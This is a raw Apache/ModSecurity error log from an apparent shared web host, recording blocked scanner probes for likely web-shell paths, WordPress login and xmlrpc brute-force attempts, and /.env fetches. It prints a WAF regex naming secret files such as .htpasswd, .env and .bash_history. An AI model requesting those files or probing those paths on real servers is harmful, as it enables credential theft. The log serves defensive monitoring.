[Tue May 26 16:57:17.548810 2026] [security2:error] [pid 839808:tid 839988] [client 20.151.111.128:10551] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWDlZqtwAfohijxAqhfaAAAATo"], referer: www.google.com
[Tue May 26 16:57:17.575171 2026] [security2:error] [pid 839808:tid 840008] [client 20.151.111.128:10520] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWDlZqtwAfohijxAqhfYwAAAU4"], referer: www.google.com
[Tue May 26 16:57:17.749321 2026] [security2:error] [pid 839808:tid 839966] [client 20.151.111.128:10538] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWDlZqtwAfohijxAqhfbQAAASQ"], referer: www.google.com
[Tue May 26 16:57:17.792260 2026] [security2:error] [pid 839808:tid 840029] [client 20.151.111.128:10520] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWDlZqtwAfohijxAqhfbgAAAWM"], referer: www.google.com
[Tue May 26 16:57:18.292127 2026] [security2:error] [pid 839808:tid 839993] [client 20.151.111.128:10510] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/pnjwpvtz.php"] [unique_id "ahWDlpqtwAfohijxAqhfegAAAT8"], referer: www.google.com
[Tue May 26 16:57:18.367042 2026] [security2:error] [pid 839808:tid 839957] [client 20.151.111.128:8130] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/owsrjjzs.php"] [unique_id "ahWDlpqtwAfohijxAqhfewAAARs"], referer: www.google.com
[Tue May 26 16:57:19.172499 2026] [security2:error] [pid 839808:tid 839962] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDlJqtwAfohijxAqhfUwAAASA"]
[Tue May 26 16:57:20.084759 2026] [security2:error] [pid 839808:tid 840034] [client 117.198.37.168:50271] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWDmJqtwAfohijxAqhfjQAAAWg"]
[Tue May 26 16:57:20.084909 2026] [security2:error] [pid 839808:tid 840034] [client 117.198.37.168:50271] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWDmJqtwAfohijxAqhfjQAAAWg"]
[Tue May 26 16:57:20.209104 2026] [autoindex:error] [pid 839808:tid 840007] [client 162.14.66.219:0] AH01276: Cannot serve directory /home2/glorolle/public_html/gldmarsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://gldmarsa.com
[Tue May 26 16:57:20.693033 2026] [security2:error] [pid 839808:tid 839994] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDlpqtwAfohijxAqhfgQAAAUA"]
[Tue May 26 16:57:21.204319 2026] [core:error] [pid 839808:tid 840038] [client 74.7.228.41:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:57:21.204346 2026] [core:error] [pid 839808:tid 840038] [client 74.7.228.41:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:57:21.204467 2026] [security2:error] [pid 839808:tid 840038] [client 74.7.228.41:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "www.financepointaustralia.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahWDmZqtwAfohijxAqhfsAAAAWw"]
[Tue May 26 16:57:21.205097 2026] [security2:error] [pid 839808:tid 839993] [client 74.7.228.41:33404] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "www.financepointaustralia.srsglobalsoft.com"] [uri "/robots.txt"] [unique_id "ahWDmZqtwAfohijxAqhfrAABPw8"]
[Tue May 26 16:57:22.012238 2026] [security2:error] [pid 839808:tid 840031] [client 14.172.236.239:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDmJqtwAfohijxAqhfmwAAAWU"]
[Tue May 26 16:57:22.121550 2026] [security2:error] [pid 839808:tid 839837] [remote 74.7.241.58:54586] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWDmpqtwAfohijxAqhfvgABWxo"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 16:57:22.420818 2026] [security2:error] [pid 839808:tid 839942] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDmJqtwAfohijxAqhfowAAAQw"]
[Tue May 26 16:57:23.090399 2026] [security2:error] [pid 839808:tid 839987] [client 114.119.146.111:24125] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "whitesun.in"] [uri "/1hfq/fragments-in-android-example-androidhive.html"] [unique_id "ahWDm5qtwAfohijxAqhfzgAAATk"], referer: https://whitesun.in/1hfq/fragments-in-android-example-androidhive.html
[Tue May 26 16:57:24.031231 2026] [security2:error] [pid 839808:tid 839984] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDmpqtwAfohijxAqhfxgAAATY"]
[Tue May 26 16:57:25.693870 2026] [security2:error] [pid 839808:tid 840018] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDnJqtwAfohijxAqhf5gAAAVg"]
[Tue May 26 16:57:27.443021 2026] [security2:error] [pid 839808:tid 839948] [client 49.13.24.81:58866] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahWDn5qtwAfohijxAqhgXQAAARI"], referer: https://thegoodsporting.com
[Tue May 26 16:57:27.484795 2026] [security2:error] [pid 839808:tid 840065] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDnpqtwAfohijxAqhgQwAAAYc"]
[Tue May 26 16:57:29.277027 2026] [security2:error] [pid 839808:tid 839966] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDoJqtwAfohijxAqhgdgAAASQ"]
[Tue May 26 16:57:30.505099 2026] [security2:error] [pid 839808:tid 840011] [client 117.198.37.168:50588] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWDopqtwAfohijxAqhgrAAAAVE"]
[Tue May 26 16:57:30.505225 2026] [security2:error] [pid 839808:tid 840011] [client 117.198.37.168:50588] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWDopqtwAfohijxAqhgrAAAAVE"]
[Tue May 26 16:57:31.079199 2026] [security2:error] [pid 839808:tid 840000] [client 20.151.111.128:7314] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-plain.php"] [unique_id "ahWDo5qtwAfohijxAqhgtAAAAUY"], referer: www.google.com
[Tue May 26 16:57:31.107102 2026] [security2:error] [pid 839808:tid 840055] [client 20.151.111.128:8187] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWDo5qtwAfohijxAqhgtQAAAX0"], referer: www.google.com
[Tue May 26 16:57:31.383982 2026] [security2:error] [pid 839808:tid 840022] [client 176.65.139.231:38618] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "armourin.srsglobalsoft.com"] [uri "/.env"] [unique_id "ahWDo5qtwAfohijxAqhguQAAAVw"]
[Tue May 26 16:57:31.395079 2026] [security2:error] [pid 839808:tid 840030] [client 176.65.139.234:17726] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "financepointaustralia.srsglobalsoft.com"] [uri "/.env"] [unique_id "ahWDo5qtwAfohijxAqhgugAAAWQ"]
[Tue May 26 16:57:31.458962 2026] [security2:error] [pid 839808:tid 839954] [client 176.65.139.238:36304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "codealtis.srsglobalsoft.com"] [uri "/.env"] [unique_id "ahWDo5qtwAfohijxAqhgvgAAARg"]
[Tue May 26 16:57:31.650202 2026] [security2:error] [pid 839808:tid 839976] [client 20.151.111.128:8132] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahWDo5qtwAfohijxAqhgwgAAAS4"]
[Tue May 26 16:57:32.075458 2026] [security2:error] [pid 839808:tid 839991] [client 20.151.111.128:7280] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-plain.php"] [unique_id "ahWDpJqtwAfohijxAqhg0gAAAT0"], referer: www.google.com
[Tue May 26 16:57:32.076138 2026] [security2:error] [pid 839808:tid 840064] [client 20.151.111.128:8130] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWDpJqtwAfohijxAqhg0wAAAYY"], referer: www.google.com
[Tue May 26 16:57:32.425179 2026] [security2:error] [pid 839808:tid 839998] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDopqtwAfohijxAqhgqwAAAUQ"]
[Tue May 26 16:57:32.628811 2026] [security2:error] [pid 839808:tid 839958] [client 20.151.111.128:9688] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahWDpJqtwAfohijxAqhg3QAAARw"]
[Tue May 26 16:57:33.223304 2026] [security2:error] [pid 839808:tid 840062] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDpJqtwAfohijxAqhgzAAAAYQ"]
[Tue May 26 16:57:33.446735 2026] [autoindex:error] [pid 839808:tid 840007] [client 107.22.136.169:47698] AH01276: Cannot serve directory /home1/micro3e1/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:57:33.518012 2026] [autoindex:error] [pid 839808:tid 840017] [client 107.22.136.169:39870] AH01276: Cannot serve directory /home1/micro3e1/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:57:33.791965 2026] [security2:error] [pid 839808:tid 839929] [remote 88.198.165.116:60726] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.165.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWDpZqtwAfohijxAqhg-QABOXY"]
[Tue May 26 16:57:34.346381 2026] [security2:error] [pid 839808:tid 839922] [remote 52.18.195.140:36822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 140.195.18.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWDppqtwAfohijxAqhhDQABJW8"]
[Tue May 26 16:57:35.175908 2026] [security2:error] [pid 839808:tid 840040] [client 20.151.111.128:10552] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/vgluplrs.php"] [unique_id "ahWDp5qtwAfohijxAqhhIwAAAW4"], referer: www.google.com
[Tue May 26 16:57:35.272415 2026] [security2:error] [pid 839808:tid 839944] [client 20.151.111.128:10529] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahWDp5qtwAfohijxAqhhLgAAAQ4"]
[Tue May 26 16:57:35.282269 2026] [autoindex:error] [pid 839808:tid 839999] [client 104.168.28.15:0] AH01276: Cannot serve directory /home1/moesartc/public_html/vishaal-shah.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:57:35.512776 2026] [security2:error] [pid 839808:tid 839982] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDppqtwAfohijxAqhhDAAAATQ"]
[Tue May 26 16:57:36.585148 2026] [security2:error] [pid 839808:tid 839958] [client 20.151.111.128:10519] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/gqcxvraa.php"] [unique_id "ahWDqJqtwAfohijxAqhhUAAAARw"], referer: www.google.com
[Tue May 26 16:57:36.694991 2026] [security2:error] [pid 839808:tid 840054] [client 20.151.111.128:10532] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahWDqJqtwAfohijxAqhhXAAAAXw"]
[Tue May 26 16:57:37.214960 2026] [security2:error] [pid 839808:tid 840020] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDp5qtwAfohijxAqhhNAAAAVo"]
[Tue May 26 16:57:37.423460 2026] [security2:error] [pid 839808:tid 840038] [client 62.60.130.233:65244] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "amostracomunicacao.com.br.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWDqZqtwAfohijxAqhhaQAAAWw"], referer: https://www.linkedin.com/
[Tue May 26 16:57:38.825971 2026] [security2:error] [pid 839808:tid 839943] [client 138.199.62.226:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWDqpqtwAfohijxAqhhgQAAAQ0"]
[Tue May 26 16:57:39.430030 2026] [security2:error] [pid 839808:tid 840029] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDqZqtwAfohijxAqhhcwAAAWM"]
[Tue May 26 16:57:39.486173 2026] [core:error] [pid 839808:tid 839946] [client 205.210.31.143:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:57:39.486194 2026] [core:error] [pid 839808:tid 839946] [client 205.210.31.143:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:57:39.623652 2026] [security2:error] [pid 839808:tid 840006] [client 74.125.208.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahWDq5qtwAfohijxAqhhkAAAAUw"]
[Tue May 26 16:57:39.754943 2026] [security2:error] [pid 839808:tid 839992] [client 45.154.98.38:52287] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "worldwidecourier.co.in.onesoft.in"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWDq5qtwAfohijxAqhhngAAAT4"]
[Tue May 26 16:57:40.752699 2026] [security2:error] [pid 839808:tid 840030] [client 20.151.111.128:7435] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahWDrJqtwAfohijxAqhhtwAAAWQ"]
[Tue May 26 16:57:40.811069 2026] [security2:error] [pid 839808:tid 840043] [client 45.154.98.38:57174] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 38.98.154.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "worldwidecourier.co.in.onesoft.in"] [uri "/xmlrpc.php"] [unique_id "ahWDrJqtwAfohijxAqhhsgAAAXE"]
[Tue May 26 16:57:41.104841 2026] [security2:error] [pid 839808:tid 840001] [client 117.198.37.168:50901] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWDrJqtwAfohijxAqhhvQAAAUc"]
[Tue May 26 16:57:41.104994 2026] [security2:error] [pid 839808:tid 840001] [client 117.198.37.168:50901] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWDrJqtwAfohijxAqhhvQAAAUc"]
[Tue May 26 16:57:41.406547 2026] [security2:error] [pid 839808:tid 840051] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDq5qtwAfohijxAqhhpwAAAXk"]
[Tue May 26 16:57:41.557195 2026] [security2:error] [pid 839808:tid 839992] [client 20.151.111.128:7465] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahWDrZqtwAfohijxAqhh0AAAAT4"]
[Tue May 26 16:57:42.007614 2026] [security2:error] [pid 839808:tid 840011] [client 45.154.98.38:52710] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "worldwidecourier.co.in.onesoft.in"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWDrpqtwAfohijxAqhh2QAAAVE"]
